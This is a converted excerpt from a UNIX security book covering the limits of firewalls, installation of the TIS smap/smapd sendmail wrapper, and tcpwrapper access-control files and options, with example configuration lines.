We started the chapter by pointing out that a firewall is not a panacea. We will conclude the chapter by<br />

making the point again: firewalls can be a big help in ensuring the security of your network; however, a<br />

misconfigured firewall, or a firewall with poor per-host controls, may actually be worse than no firewall<br />

at all. With no firewall in place, you will at least be more concerned about host security and monitoring.<br />

Unfortunately, at many sites, management may be lulled into believing that their systems are secure after<br />

they have paid for the installation of a significant firewall - especially if they are only exposed to the<br />

advertising hype of the vendor and consultants.<br />

21.6.2 Firewalls Sometimes Fail<br />

The truth of the matter is that a firewall is only one component of good security. And it is a component<br />

that is only effective against external threats. Insider attacks are seldom affected in any way by a firewall.<br />

Collusion of an insider and an outsider can circumvent a firewall in short order. And bugs,<br />

misconfiguration problems, or equipment failure may all result in a temporary failure of the firewall you<br />

have in place. One single user, anywhere "inside" your network, can also unwittingly compromise the<br />

entire firewall scheme by connecting a modem to a desktop workstation ... and you will not likely know<br />

about the compromise until you are required to clean up the resulting break in.<br />

Does this case sound unlikely? It isn't. Richard Power of the Computer <strong>Sec</strong>urity Institute (CSI) surveyed<br />

more than 320 Fortune 500 computer sites about their experiences with firewalls. His survey results were<br />

released in September of 1995 and revealed that 20% of all sites had experienced a computer security<br />

incident. Interestingly, 30% of the <strong>Internet</strong> security incidents reported by respondents occurred after the<br />

installation of a firewall. This incident rate is probably a combined result of misconfiguration,<br />

unmonitored back door connections, and other difficulties.<br />

The CSI study raised a number of questions:<br />

●<br />

Perhaps the firewall installation at some sites was faulty, or too permissive.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_06.htm (1 of 3) [2002-04-12 10:45:57]


[Chapter 21] 21.6 Final Comments<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Perhaps users internal to the organization found ways to circumvent the firewall by connecting<br />

unauthorized modems to the network, thus creating back doors into the network.<br />

Perhaps the use of firewalls resulted in feelings of overconfidence and a resulting relaxation of<br />

other, more traditional controls, thus leading to problems.<br />

Perhaps the sites using the firewalls are more attractive targets than sites without firewalls, and<br />

thus attract more attacks.<br />

Perhaps, as suggested by many other studies, the majority of incidents continue to be caused by<br />

insiders, and these are not stopped by firewalls.<br />

Perhaps the sites didn't really have a firewall. Over 50% of the companies that claimed to have a<br />

"firewall" merely had a screening router.<br />

The key conclusion to be drawn from all of this information is that one or more network firewalls may<br />

help your security, but you should plan the rest of your security so that your systems will still be<br />

protected in the event that your firewall fails.<br />

21.6.3 Do You Really Need Your Desktop Machines on the <strong>Internet</strong>?<br />

Let us conclude by reiterating something we said earlier - if you have no network connection, you don't<br />

need an external firewall. The question you really should ask before designing a firewall strategy is: what<br />

is to be gained from having the connection to the outside, and who is driving the connection? This<br />

question revisits the basic issues of policy and risk assessment discussed in Chapter 2, Policies and<br />

Guidelines.<br />

At many locations, users are clamoring for <strong>Internet</strong> access because they want access to Usenet news,<br />

entertaining mailing lists, personal email, and WWW on their desktop. However, employees often do not<br />

want access to these services for purposes that are work related or work enhancing. Indeed, many<br />

organizations are now restricting in-house access to those services because employees are wasting too<br />

much time on them. Rather than having full network access to your entire corporate network, you might<br />

consider using one approach for users who need <strong>Internet</strong> access, and a different approach for users who<br />

simply want <strong>Internet</strong> access. For example:<br />

●<br />

●<br />

●<br />

Have a disconnected network of a small number of machines that are connected to the <strong>Internet</strong>.<br />

Users who really need <strong>Internet</strong> access are given accounts on these machines for as long as they<br />

continue to need access. A tape drive or serial-line UUCP connection is made available to transfer<br />

files between these machines and the internal network without exposing all the internal nodes to<br />

IP-based attacks.<br />

Use a hard-wired UUCP connection to transfer email between your internal network and the<br />

<strong>Internet</strong>. This connection will allow your employees to exchange email with other sites for<br />

work-related purposes, but will not expose your network to IP-based attacks.<br />

Provide remaining users with some form of account access through an ISP outside your company.<br />

Then, on their own time, your employees can access the <strong>Internet</strong> (and possibly some other special<br />

services). If you negotiate with the ISP for a large block of accounts for your employees, you may<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_06.htm (2 of 3) [2002-04-12 10:45:57]


[Chapter 21] 21.6 Final Comments<br />

be able to get a very good rate. The rate may be so good, in fact, that you may wish to use<br />

company funds to subsidize the accounts, and have low-cost personal <strong>Internet</strong> access (at home) be<br />

another benefit for working at your company. This solution is probably cheaper than a firewall, a<br />

major break-in, and the time lost to employees surfing the WWW at work.<br />

Remember that the best firewall is still a large air gap between the network and any of your computers,<br />

and that a pair of wire cutters remains the most effective network protection mechanism.[14]<br />

[14] Thanks to Steve Bellovin for this observation.<br />

21.5 Special Considerations 22. Wrappers and Proxies<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_06.htm (3 of 3) [2002-04-12 10:45:57]


[Chapter 22] 22.2 sendmail (smap/smapd) Wrapper<br />

Chapter 22<br />

Wrappers and Proxies<br />

22.2 sendmail (smap/smapd) Wrapper<br />

The TIS[1] Firewall Toolkit eliminates many of the security problems of sendmail by going to the heart of the<br />

problem and breaking the connection between sendmail and the outside world. Instead of having a single SUID<br />

program (sendmail) listen for connections on port 25, implement a complex command set, and deliver mail into<br />

users' mailboxes, the TIS package uses a pair of programs - one to accept mail from the network, and one to deliver<br />

it.<br />

[1] Trusted Information Systems is a company that develops and sells a variety of security products<br />

and services. The Firewall Toolkit was largely written by a former employee, Marcus Ranum, and<br />

made available to the <strong>UNIX</strong> community for royalty-free use.<br />

22.2.1 What smap and smapd Do<br />

The sendmail wrapper programs provide the following functions:<br />

smap<br />

This program accepts messages over the network and writes them into a special disk directory for future<br />

delivery. Although the smap program runs as root, it executes in a specially designed chroot filesystem, from<br />

which it cannot damage the rest of the operating system. The daemon is designed to be invoked from inetd<br />

and exits when the mail delivery session is completed. The program logs all SMTP envelope information.<br />

smapd<br />

This program periodically scans the directory where smap delivers mail. When it finds completed messages,<br />

it delivers them to the appropriate user's mail file using sendmail or some other program.<br />

The TIS Firewall Toolkit stores configuration and permission information in a single file - usually<br />

/usr/local/etc/netperm-table. Naturally, this file should be writable only by the superuser. For added security, set it<br />

to mode 600.<br />

22.2.2 Getting smap/smapd<br />

You can obtain the TIS Firewall Toolkit from the computer ftp.tis.com using anonymous FTP.<br />

22.2.3 Installing the TIS smap/smapd sendmail Wrapper<br />

Installation of the complete TIS Firewall Toolkit can be quite complex. Fortunately, the sendmail wrapper programs<br />

can be installed without the rest of the kit. The sendmail wrapper can be used to protect any machine that runs<br />

sendmail, even if that machine is not a firewall.<br />

To install the sendmail wrapper, follow these steps:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_02.htm (1 of 5) [2002-04-12 10:45:58]


[Chapter 22] 22.2 sendmail (smap/smapd) Wrapper<br />

1. Obtain the TIS Firewall Toolkit from ftp.tis.com.<br />

2.<br />

3.<br />

4.<br />

5.<br />

6.<br />

Read the documentation and compile the sendmail wrapper.<br />

Install the netperm-table configuration file. The default location for the file is /usr/local/etc/netperm-table.<br />

Edit the smap and smapd rules to specify the UID under which you want smap to run, where you want the<br />

spooled mail kept, where the executable is stored, where your sendmail program is located, and where you<br />

want mail to go if it can't be delivered for any reason.[2] In this example, we use uid 5, which corresponds to<br />

the user mail in our /etc/passwd file.<br />

[2] If you do set the undelivered mail directory, be sure to check it regularly.<br />

For example:<br />

smap, smapd: userid 5<br />

smap, smapd: directory /var/spool/smap<br />

smapd: executable /usr/local/etc/smapd<br />

smapd: sendmail /usr/lib/sendmail<br />

smapd: baddir /var/spool/smap/bad<br />

smap: timeout 3600<br />

Create the smap mail-spool directory (e.g. /usr/spool/smap). Set the ownership of this directory to be the user<br />

specified in the configuration file:<br />

# chown 5 /usr/spool/smap<br />

# chmod 700 usr/spool/smap<br />

Also, create the smap bad mail directory (e.g., /usr/spool/smap/bad). Set the ownership of the directory to be<br />

the user specified in the configuration file.<br />

# chown 5 /usr/spool/smap /usr/spool/smap/bad<br />

# chmod 700 /usr/spool/smap /usr/spool/smap/bad<br />

Search your system's start-up files for the line in which sendmail is started with the -bd flag, and then remove<br />

the flag. This change will prevent sendmail from listening to port 25 for incoming SMTP connections, but<br />

sendmail will continue its job of attempting to deliver all of the messages in the mail queue on a periodic<br />

basis. Note that there may not be any such line: your system might be configured to run sendmail from the<br />

inetd as mail arrives.<br />

For example, if your configuration file has this:<br />

# Remove junk from the outbound mail queue directory and start up<br />

# the sendmail daemon. /usr/spool/mqueue is assumed here even though<br />

# it can be changed in the sendmail configuration file.<br />

#<br />

# Any messages which end up in the queue, rather than being delivered<br />

# or forwarded immediately, will be processed once each hour.<br />

if [ -f /usr/lib/sendmail ]; then<br />

(cd /usr/spool/mqueue; rm -f nf* lf*)<br />

/usr/lib/sendmail -bd -q1h 2>/dev/console && \<br />

(echo -n ' sendmail') >/dev/console<br />

fi<br />

Change it to this:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_02.htm (2 of 5) [2002-04-12 10:45:58]


[Chapter 22] 22.2 sendmail (smap/smapd) Wrapper<br />

7.<br />

8.<br />

9.<br />

10.<br />

11.<br />

if [ -f /usr/lib/sendmail ]; then<br />

(cd /usr/spool/mqueue; rm -f nf* lf*)<br />

/usr/lib/sendmail -q1h 2>/dev/console && \<br />

(echo -n ' sendmail') >/dev/console<br />

fi<br />

Alternatively, you can use cron to invoke sendmail on a periodic basis with the -q option, by placing the<br />

following line in your crontab file:[3]<br />

[3] Note that different versions of crontab may have slightly different syntax.<br />

30 * * * * /usr/lib/sendmail -q >/dev/null 2>&1<br />

Kill the sendmail daemon if it is running.<br />

Modify your sendmail.cf file so that the mail user is a trusted user. You need to do this so that sendmail will<br />

respect the "From:" address that smapd sets. The trusted user is set with the "T" flag. This example sets root,<br />

daemon, uucp, and mail as trusted users.<br />

###################<br />

# Trusted users #<br />

###################<br />

# this is equivalent to setting class "t"<br />

# Ft/etc/sendmail.ct<br />

Troot<br />

Tdaemon<br />

Tuucp<br />

Tmail<br />

Edit your /etc/inetd.conf file by inserting this line so that smap is started when connections are attempted on<br />

port 25:<br />

smtp stream tcp nowait root /usr/local/etc/smap smap<br />

Cause inetd to reread its initialization file by sending it a HUP signal:<br />

# ps aux | grep inetd<br />

root 129 0.0 1.8 1.52M 296K ? S 0:00 (inetd)<br />

root 1954 0.0 1.3 1.60M 208K p5 S 0:00 grep inetd<br />

# kill -HUP 129<br />

#<br />

Test to see if smap is receiving mail by trying to send mail to the root account. You can do this with telnet:[4]<br />

[4] Of course, replace bigco.com with your own computer's hostname.<br />

# telnet localhost smtp<br />

Trying 127.0.0.1... Connected to localhost.<br />

Escape character is "^]".<br />

220 BIGCO.COM SMTP/smap Ready.<br />

helo bigco.com<br />

250 (bigco.com) pleased to meet you.<br />

mail From:<br />

250 ... Sender Ok<br />

rcpt To:<br />

250 OK<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_02.htm (3 of 5) [2002-04-12 10:45:58]


[Chapter 22] 22.2 sendmail (smap/smapd) Wrapper<br />

12.<br />

13.<br />

14.<br />

15.<br />

data<br />

354 Enter mail, end with "." on a line by itself<br />

This is a test.<br />

.<br />

250 Mail accepted<br />

quit<br />

221 Closing connection<br />

Connection closed by foreign host.<br />

#<br />

Check to see if the mail has, in fact, been put into the /var/spool/smap directory (or whichever directory you<br />

specified.)<br />

Install smapd in /usr/local/etc/smapd or another suitable directory.<br />

Start smapd by hand and see if the mail is delivered.<br />

Modify your system's start-up files so that smapd is run automatically at system start up.<br />

22.2.4 Possible Drawbacks<br />

There are some drawbacks to using the smap program as described earlier. The first is that people who are<br />

contacting your site on TCP port 25 will no longer be able to execute the VRFY or EXPN SMTP commands that<br />

are supported by regular sendmail. (Actually, they will be able to execute them, but nothing useful will be<br />

returned.) These commands allow a remote client to verify that an address is local to a machine (VRFY) and to<br />

expand an alias (EXPN). Arguably, these are possible security risks, but in some environments they are useful (as<br />

we illustrate in Chapter 24, Discovering a Break-in).<br />

Using identd<br />

Most network servers log the hostname of the client machine that initiates the connection. Unfortunately, this is<br />

frequently not enough information. Consider what happens when someone uses telnet to connect to your machine to<br />

forge email. You may have very little hope of identifying the perpetrator other than knowing the address of the<br />

machine that originated the connection. If that machine has typical logging or supports a large number of users,<br />

even the cooperation of the administrators of that machine may not be sufficient to trace the attack back to the<br />

perpetrator.<br />

It is because of this situation that the ident protocol was defined (in RFC 1413). The ident protocol is a service that<br />

can possibly determine the identity of a user at the other end of a network connection. When a remote client<br />

connects to a server machine, the server can open a connection back to an ident server on the client machine. The<br />

client machine presents the ident server with the port numbers of the connection it wishes to identify. The ident<br />

server then responds with some value that can be used later, if needed, to identify the originating account.<br />

Normally, this string is the username associated with that account. However, the administrator of the remote<br />

machine may wish to configure it to return some other value that can be used later but that does not explicitly name<br />

a user. For example, it could return an encrypted username.<br />

Note that identd is most definitely not a form of authentication. At best, it is a weak form of identification. The<br />

remote server may not return useful information if the service has been compromised. It also depends on the remote<br />

site administrator having installed an unmodified and working ident server - and many people do not. Some people<br />

believe that because ident cannot be trusted, they will not allow it to return any useful information at all, so they<br />

configure their server to always return "Hillary Clinton" or "Bill Gates." However, in most instances, returning<br />

valid information is helpful. In many university environments, for instance, where the ident servers are usually<br />

monitored and under central administrative control, using ident to tag users who forge email is especially helpful.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_02.htm (4 of 5) [2002-04-12 10:45:58]


[Chapter 22] 22.2 sendmail (smap/smapd) Wrapper<br />

To take advantage of ident, your software needs to know how to query the remote server, if it exists. It then needs to<br />

log that information appropriately. Modern versions of sendmail have this built in, to help cut down on mail<br />

forging. The tcpwrapper program also knows how to query ident.<br />

Keep in mind that if you record information from an ident server, it may not be correct. In fact, if you are<br />

investigating a problem that is actually being caused by the system administrator of the remote system, he or she<br />

may have altered the ident service. The service may thus return information designed to throw you off by pointing<br />

at someone else.<br />

Currently, identd is shipped standard with few systems. For example, it is shipped with Linux, but is not usually<br />

enabled in the /etc/inetd.conf file.<br />

A more serious shortcoming is that versions of sendmail with built-in support for the ident protocol will no longer<br />

be able to obtain information about the sending user. The use of the ident protocol is discussed in the sidebar "Using<br />

identd".<br />

If using ident makes sense in your environment, you won't be able to use it with smap unless you spawn smap from<br />

another wrapper that implements ident, such as the tcpwrapper program, which is described in the next section.<br />

22.1 Why Wrappers? 22.3 tcpwrapper<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_02.htm (5 of 5) [2002-04-12 10:45:58]


[Chapter 22] 22.3 tcpwrapper<br />

22.3 tcpwrapper<br />

Chapter 22<br />

Wrappers and Proxies<br />

The tcpwrapper program, written by Wietse Venema, is an easy-to-use utility that you can use for logging and intercepting TCP<br />

services that are started by inetd.<br />

22.3.1 Getting tcpwrapper<br />

The tcpwrapper program can be downloaded from the <strong>Internet</strong> using anonymous FTP. The path is:<br />

ftp://ftp.win.tue.nl/pub/security/tcp_wrapper_XXX.tar.gz<br />

Where XXX is the current version number. The file that you FTP will be a tar archive compressed with gunzip (often called gzip).<br />

While you are connected to the computer ftp.win.tue.nl, you might want to pick up Venema's portmapper replacement.<br />

Another good place to look for tcpwrapper is:<br />

ftp://coast.cs.purdue.edu/pub/tools/tcp_wrappers<br />

While you are connected to the coast.cs.purdue.edu machine, you can find scores of other nifty security tools and papers, so don't<br />

connect if you only have a few minutes to spare!<br />

The tcpwrapper program is shipped standard with only a few operating systems such as BSD/OS. (It is shipped standard with Linux<br />

but is rarely configured properly.) We hope that this standard will change in the future.<br />

22.3.2 What tcpwrapper Does<br />

The tcpwrapper program gives the system administrator a high degree of control over incoming TCP connections. The program is<br />

started by inetd after a remote host connects to your computer; then tcpwrapper does one or more of the following:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Optionally sends a "banner" to the connecting client. Banners are useful for displaying legal messages or advisories.<br />

Performs a double-reverse lookup of the IP address, making sure that the DNS[5] entries for the IP address and hostname<br />

match. If they do not, this fact is logged. (By default, tcpwrapper is compiled with the -DPARANOID option, so the program<br />

will automatically drop the incoming connection if the two do not match, under the assumption that something somewhere is<br />

being hacked.)<br />

[5] Domain Name Service, the distributed service that maps IP numbers to hostnames, and vice versa.<br />

Compares the incoming hostname and requested service with an access control list, to see if this host or this combination of<br />

host and service has been explicitly denied. If either is denied, tcpwrapper drops the connection.<br />

Uses the ident protocol (RFC 1413)[6] to determine the username associated with the incoming connection.<br />

[6] RFC 1413 superseded RFC 931, but the define in the code has not changed.<br />

Logs the results with syslog. (For further information, see Chapter 10, Auditing and Logging.)<br />

Optionally runs a command. (For example, you can have tcpwrapper run finger, to get a list of users on a computer that is<br />

trying to contact yours.)<br />

Passes control of the connection to the "real" network daemon, or passes control to some other program that can take further<br />

action.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_03.htm (1 of 9) [2002-04-12 10:45:59]


[Chapter 22] 22.3 tcpwrapper<br />

●<br />

Transfers to a "jail" or "faux" environment where you study the user's actions.[7]<br />

[7] We won't describe this approach further. It requires some significant technical sophistication to get right, is of<br />

limited value in most environments, and may pose some potentially significant legal problems. For further<br />

information on hacker jails, see Firewalls and <strong>Internet</strong> <strong>Sec</strong>urity by Bill Cheswick and Steve Bellovin.<br />

The tcpwrapper thus gives you a way to add logging to services that are not normally logged, such as finger and systat. It also allows<br />

you to substitute different versions of a service daemon depending on the calling host - or to reject the connection without providing<br />

any server at all.<br />

22.3.3 Understanding Access Control<br />

The tcpwrapper system has a simple but powerful language and a pair of configuration files that allow you to specify whether or not<br />

incoming connections should be accepted. The files are /etc/hosts.allow and /etc/hosts.deny. When an incoming connection is handed<br />

to tcpwrapper, the program applies the following rules:<br />

1.<br />

2.<br />

3.<br />

The file /etc/hosts.allow is searched to see if this (host, protocol) pair should be allowed.<br />

If no match if found, the file /etc/hosts.deny is searched to see if this (host, protocol) pair should be denied.<br />

If no match is found, the connection is allowed.<br />

Each line in the /etc/hosts.allow and/etc/hosts.deny file has the following format:<br />

daemon_list : client_host_list [: shell_command]<br />

Where:<br />

daemon_list<br />

Specifies the command name (argv[0]) of a list of TCP daemons (e.g., telnetd). The reserved keyword "ALL" matches all<br />

daemons; you can also use the "EXCEPT" operator (e.g., "ALL EXCEPT in.ftpd").<br />

client_host_list<br />

Specifies the hostname or IP address of the incoming connection. You can also use the format username@hostname to specify<br />

a particular user on a remote computer, although the remote computer must implement the ident protocol.[8] The keyword<br />

ALL matches all clients; for a full list of keywords, see Table 22.1.<br />

[8] And as we noted in the discussion of ident, the identification returned is not something that can always be<br />

believed.<br />

shell_command<br />

Specifies a command that should be executed if the daemon_list and client_host_list are matched. A limited amount of token<br />

expansion is available within the shell command; see Table 22.2 for a list of the tokens that are available.<br />

Table 22.1: Special tcpwrapper Hosts<br />

Hostname as it Appears in the File /etc/hosts.allow or Has This Effect:<br />

/etc/hosts.deny<br />

ALL Matches all hosts.<br />

KNOWN Matches any IP address that has a corresponding hostname; also<br />

matches usernames when the ident service is available.<br />

LOCAL Matches any host that does not have a period (.) in its name.<br />

PARANOID Matches any host for which double-reverse hostname/IP address<br />

translation does not match.<br />

UNKNOWN Matches any IP address that does not have a corresponding hostname.<br />

Also matches usernames when ident service is not available.<br />

.subdomain.domain If the hostname begins with a period (.), the hostname will match any<br />

host whose hostname ends with the hostname (in this case,<br />

".subdomain.domain").<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_03.htm (2 of 9) [2002-04-12 10:45:59]


[Chapter 22] 22.3 tcpwrapper<br />

iii. iii.jjj. iii.jjj.kkk. iii.jjj.kkk.lll. (e.g.,18. or 204.17.195.) If the hostname ends with a period (.), the hostname is interpreted as<br />

the beginning of an IP address. The string "18." will match any host<br />

with an IP addresses 18.0.0.1 through 18.255.255.254. The string<br />

"204.17.195." will match any host with an IP addresses 204.17.195.1<br />

through 204.17.195.254.<br />

a pattern EXCEPT another pattern Matches any host that is matched by a pattern except those that also<br />

match another pattern.[9]<br />

[9] The EXCEPT operator may also be used for specifying an <strong>Internet</strong> service.<br />

Table 22.2: Token Expansion Available for the tcpwrapper Shell Command<br />

Token Mnemonic Expands to:<br />

%a address The IP address of the client.<br />

%A address The IP address of the server.<br />

%c client info username@hostname (if username is available); otherwise, only hostname or IP address.<br />

%d daemon name The name of the daemon (argv[0]).<br />

%h hostname The hostname of the client. (IP address if hostname is unavailable.)<br />

%H hostname The hostname of the server. (IP address if hostname is unavailable.)<br />

%p process The Process ID of the daemon process.<br />

%s server info. daemon@host.<br />

%u user The client username (or unknown)<br />

%% percent Expands to the "%" character.<br />

NOTE: The tcpwrapper is vulnerable to IP spoofing because it uses IP addresses for authentication. The tcpwrapper<br />

also provides only limited support for UDP servers, because once the server is launched, it will continue to accept<br />

packets over the network, even if those packets come from "blocked" hosts.<br />

22.3.4 Installing tcpwrapper<br />

tcpwrapper is a powerful program that can seriously mess up your computer if it is not properly installed. It has many configuration<br />

options that are set at compile time. Therefore, before you start compiling or installing the program, read all of the documentation.<br />

Briefly, here is what the documentation will tell you to do:<br />

1.<br />

2.<br />

3.<br />

4.<br />

5.<br />

You need to decide where to place the tcpwrapper program and where to place your "real" network daemons. The<br />

documentation will give you a choice. Your first option is to name the tcpwrapper program something innocuous, like<br />

/usr/local/etc/tcpd, leave the "real" network daemons in their original locations, and modify the inetd configuration file<br />

/etc/inetd.conf. Alternatively, you can move the network daemons (such as /usr/sbin/in.fingerd) to another location (such as<br />

/usr/sbin.real/in.fingerd), place the tcpwrapper in the location that the daemon formerly occupied, and leave the file<br />

/etc/inetd.conf as is.<br />

We recommend that you leave your executable programs where they currently are, and modify the /etc/inetd.conf file. The<br />

reason for this recommendation is that having changes in your system configuration clearly indicated in your system<br />

configuration files is less confusing than changing the names and/or the locations of your distributed system programs. In the<br />

long run, this option is much more maintainable. This is especially important if vendor patches expect to find the binary where<br />

it was originally stored, and overwrite it.<br />

Having followed our advice and decided that you will modify your /etc/inetd.conf file, make a copy of the file, in case you<br />

make any mistakes later:<br />

# cp /etc/inetd.conf /etc/inetd.conf.DIST<br />

#<br />

Edit tcpwrapper's Makefile so that the variable REAL_DAEMON_DIR reflects where your operating system places its network<br />

daemons. Check the other options in the Makefile to be sure they are appropriate to your needs.<br />

Compile tcpwrapper.<br />

Read the tcpwrapper man pages host_access and host_options. These files define the tcpwrapper host access-control language<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_03.htm (3 of 9) [2002-04-12 10:45:59]


[Chapter 22] 22.3 tcpwrapper<br />

6.<br />

7.<br />

8.<br />

9.<br />

10.<br />

that is used by the files /etc/hosts.allow and /etc/hosts.deny.<br />

You may wish to start off with a relatively simple set of rules - for example, allowing all services to all machines except for a<br />

small group that have been known to cause problems. But you may wish to also enable complete logging, so that you can see if<br />

particular services or sites warrant further attention.<br />

Create your /etc/hosts.allow and/etc/hosts.deny files. If you wish to allow all TCP servers through, you do not need to create<br />

these files at all (tcpwrapper will default to rule #3, which is to pass through all connections). If you wish to deny service from<br />

a specific machine, such as pirate.net, you could simply create a single /etc/hosts.deny file, like this:<br />

#<br />

# /etc/hosts.deny<br />

#<br />

all : pirate.net<br />

Alternatively, you could use the following /etc/hosts.deny, which would finger the computer pirate.net and email the result to<br />

you (security@machine.com), whenever somebody from that network tries to initiate any connection to your machine. Note<br />

that this example uses the safe_finger command that comes with tcpwrapper; this version of the finger command will remove<br />

control characters or other nasty data that might be returned from a finger server running on a remote machine, as well as limit<br />

the total amount of data received:[10]<br />

[10] The safe_finger program is a replacement for your system's finger program, which automatically filters out<br />

dangerous characters allowed through by the standard versions of finger. If you don't think that your standard<br />

<strong>UNIX</strong> finger program should allow data-driven attacks, you might wish to send a letter to your <strong>UNIX</strong> vendor.<br />

#<br />

# /etc/hosts.deny with more logging!<br />

#<br />

all EXCEPT in.fingerd : pirate.net : (/usr/local/bin/safe_finger -l @%h | \<br />

/bin/mailx -s %d-%h<br />

security@machine.com) &<br />

Note that the /etc/hosts.deny file allows continuation lines by using the backslash (\) character.<br />

The finger command is run for all services except in.fingerd; this restriction prevents a "feedback loop" in which a finger on<br />

one computer triggers a finger on a second computer, and vice versa. Also note that the finger command is run in the<br />

background; this mode prevents tcpwrapper from waiting until the safe_finger command completes.<br />

Check out your /etc/syslog.conf file to make sure that tcpwrapper's events will be logged! By default, tcpwrapper will log with<br />

LOG_ERR if a program cannot be launched, LOG_WARNING if a connection is rejected, and LOG_INFO if a connection is<br />

accepted. The logging service is LOG_MAIL, but you can change it by editing the program's Makefile.<br />

If you make any changes to the syslog configuration file, restart syslog with the command:<br />

# kill -1 `cat /etc/syslog.pid`<br />

Edit your /etc/inetd.conf file so that the tcpwrapper program is invoked by inetd for each service that you wish to log and<br />

control.<br />

Modifying the /etc/inetd.conf file is easy: simply change the filename of each program to the full pathname of the tcpwrapper<br />

program, and edit the command name of each program so that it is the complete pathname of the original network daemon.<br />

For example, if you have a line in your original /etc/inetd.conf file that says this:<br />

finger stream tcp nowait nobody /usr/etc/fingerd fingerd<br />

Change it to this:<br />

finger stream tcp nowait nobody /usr/local/bin/tcpd /usr/etc/fingerd<br />

You may need to send a signal to the inetd daemon, or restart it, to get it to note the new configuration you have added.<br />

Test to make sure that everything works! For example, try doing a finger of your computer; does a message get written into<br />

your system's log files? If not, check to make sure that inetd is starting the tcpwrapper, that tcpwrapper can access its<br />

configuration files, and that the syslog system is set up to do something with tcpwrapper's messages.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_03.htm (4 of 9) [2002-04-12 10:45:59]


22.3.5 Advanced tcpwrapper Options<br />

Instead of specifying a particular shell command that should be executed when a (daemon, host) line is matched, tcpwrapper allows<br />

you to specify a rich set of options. To use options, you compile the tcpwrapper program with the option -DPROCESS_OPTIONS. If<br />

you compile with -DPROCESS_OPTIONS, you must change the files /etc/hosts.allow and /etc/hosts.deny files to reflect that change;<br />

the format of these files when tcpwrapper is compiled with -DPROCESS_OPTIONS is incompatible with the format of the files<br />

when tcpwrapper is compiled without the options.<br />

If you do compile with -DPROCESS_OPTIONS, the new format of the /etc/hosts.allow and /etc/hosts.deny becomes:<br />

daemon_list : client_host_list : option : option ...<br />

Because you may have more than one option on a line, if you need to place a colon (:) within the option, you must protect it with a<br />

backslash (\).<br />

The options allow you considerable flexibility in handling a variety of conditions. They also somewhat obsolete the need to have<br />

separate /etc/hosts.allow and /etc/hosts.deny files, as the words "allow" and "deny" are now option keywords (making it possible to<br />

deny a specific pair (daemon, client) in the /etc/hosts.allow file, or vice versa). Although you should check tcpwrapper's<br />

documentation for a current list of options, most of them are included in Table 22.3<br />

Table 22.3: Advanced Options for tcpwrapper When Compiled with -DPROCESS_OPTIONS<br />

Option Effect<br />

allow Allows the connection.<br />

deny Denies the connection.<br />

Options for dealing with sub-shells:<br />

nice nn Changes the priority of the process to nn. Use numbers such as +4 or +8 to reduce the amount of CPU<br />

time allocated to network services.<br />

setenv name value Sets the environment variable name to value for the daemon.<br />

spawn shell_command Runs the shell_command. The streams stdin, stdout, and stderr are connected to /dev/null to avoid<br />

conflict with any communications with the client.<br />

twist shell_command Runs the shell_command. The streams stdin, stdout, and stderr are connected to the remote client. This<br />

allows you to run a server process other than the one specified in the file /etc/inetd.conf. (Note: Will not<br />

work with some UDP services.)<br />

umask nnn Specifies the umask that should be used for sub-shells. Specify it in octal.<br />

user username Assume the privileges of username. (Note: tcpwrapper must be running as root for this option to work.)<br />

user username.groupname Assume the privileges of username and set the current group to be groupname.<br />

Options for dealing with the network connection:<br />

banners /some/directory/ Specifies a directory that contains banner files. If a filename is found in the banner directory that has the<br />

same name as the network server (such as telnetd), the contents of the banner file are sent to the client<br />

before the TCP connection is turned over to the server. This process allows you to send clients messages,<br />

for example, informing them that unauthorized use of your computer is prohibited.<br />

keepalive Causes the <strong>UNIX</strong> kernel to periodically send a message to a client process; if the message cannot be<br />

sent, the connection is automatically broken.<br />

linger seconds Specifies how long the <strong>UNIX</strong> kernel should spend trying to send a message to the remote client after the<br />

server closes the connection.<br />

rfc931 [timeout in seconds] Specifies that the ident protocol should be used to attempt to determine the username of the person<br />

running the client program on the remote computer. The timeout, if specified, is the number of seconds<br />

that tcpwrapper should spend waiting for this information.<br />

.<br />

[Chapter 22] 22.3 tcpwrapper<br />

Don't be afraid of using these so-called "advanced" options: they actually allow you to have simpler configurations than the<br />

/etc/hosts.allow and /etc/hosts.deny files.<br />

NOTE: The following examples use DNS hostnames for clarity. For added security, use IP addresses instead.<br />

Suppose you wish to allow all connections to your computer, except those from the computers in the domain pirate.net, with this<br />

very simple /etc/hosts.allow file; specify:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_03.htm (5 of 9) [2002-04-12 10:45:59]


[Chapter 22] 22.3 tcpwrapper<br />

#<br />

# /etc/hosts.allow:<br />

#<br />

# Allow anybody to connect to our machine except people from pirate.net<br />

#<br />

all : .pirate.net : deny<br />

all : all : allow<br />

Suppose you wish to modify your rules to allow the use of finger from any of your internal machines, but you wish to have external<br />

finger requests met with a canned message. You might try this configuration file:<br />

#<br />

# /etc/hosts.allow:<br />

#<br />

# Allow anybody to connect to our machine except people from pirate.net<br />

#<br />

#<br />

in.fingerd : LOCAL : allow<br />

in.fingerd : all : twist /usr/local/bin/external_fingerd_message<br />

